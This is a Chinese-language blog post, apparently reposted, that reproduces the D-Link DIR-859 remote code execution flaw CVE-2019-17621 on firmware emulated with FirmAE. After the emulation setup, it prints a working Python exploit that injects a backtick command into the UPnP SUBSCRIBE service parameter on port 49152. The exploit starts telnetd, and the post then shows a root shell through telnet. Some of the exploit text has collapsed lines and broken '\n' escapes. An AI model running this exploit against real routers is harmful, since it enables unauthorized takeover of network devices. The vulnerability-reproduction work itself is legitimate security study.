D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

admin 2023年3月17日10:53:32评论154 views字数 1472阅读4分54秒阅读模式

环境搭建

1.FirmAE 工具安装

首先拉取FirmAE 工具仓库

git clone --recursive https://github.com/pr0v3rbs/FirmAE

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

运行下载脚本

cd FirmAE/./download.sh

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

运行./install.sh进行安装

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

2.下载固件

本文模拟的是设备型号为D-Link DIR-859

下载地址:

http://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DIR-859

下载后得到DIR859Ax_FW105b03.bin固件文件

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

3.FirmAE工具初始化

FirmAE工具目录下执行./init.sh进行初始化

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

4.安装binwalk

这里使用FirmAE工具目录下的binwalk安装程序进行安装

cd binwalk-2.3.3/python3 setup.py install

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

5.模拟运行固件
执行如下命令对固件进行解压

binwalk -Me /root/DIR859_FW102b03.bin --run-as=root

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

执行如下命令来模拟运行固件

sudo ./run.sh -r DIR-859 /root/DIR859_FW102b03.bin

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

使用浏览器访问http://192.168.0.1,出现如下界面则表明成功模拟了一台D-Link DIR-859路由器

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

漏洞复现

查看端口

nmap 192.168.0.1

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

使用49152端口

EXP内容如下:

import socketimport osfrom time import sleep
def httpSUB(server, port, shell_file): con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) Payload = "SUBSCRIBE /gena.cgi?service=" + str(shell_file) + " HTTP/1.0n" Payload += "Host: " + str(server) + ":" + str(port) + "n" Payload += "Callback: <http://192.168.126.128:33/>n" Payload += "NT: upnp:eventn" Payload += "Timeout: Second-1800n" Payload += "Accept-Encoding: gzip, deflaten" Payload += "User-Agent: gupnp-universal-cp GUPnP/1.0.2 DLNADOC/1.50nn" print(Payload) sleep(1) print('[*] Sending Payload') con.connect((socket.gethostbyname(server),port)) con.send(Payload.encode()) results = con.recv(4096)
sleep(1) print('[*] Running Telnetd Service')
serverInput = raw_input('IP Router: ')portInput = 49152
httpSUB(serverInput, portInput, '`telnetd`')

执行EXP

python poc.py

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

使用nmap扫描可以看到已成功通过漏洞开启了telnetd服务

nmap 192.168.0.1

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

执行telnet 192.168.0.1,成功获取shell

D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现


D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现


D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

原文始发于微信公众号(第59号):D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月17日10:53:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现http://cn-sec.com/archives/1610453.html

发表评论

匿名网友 填写信息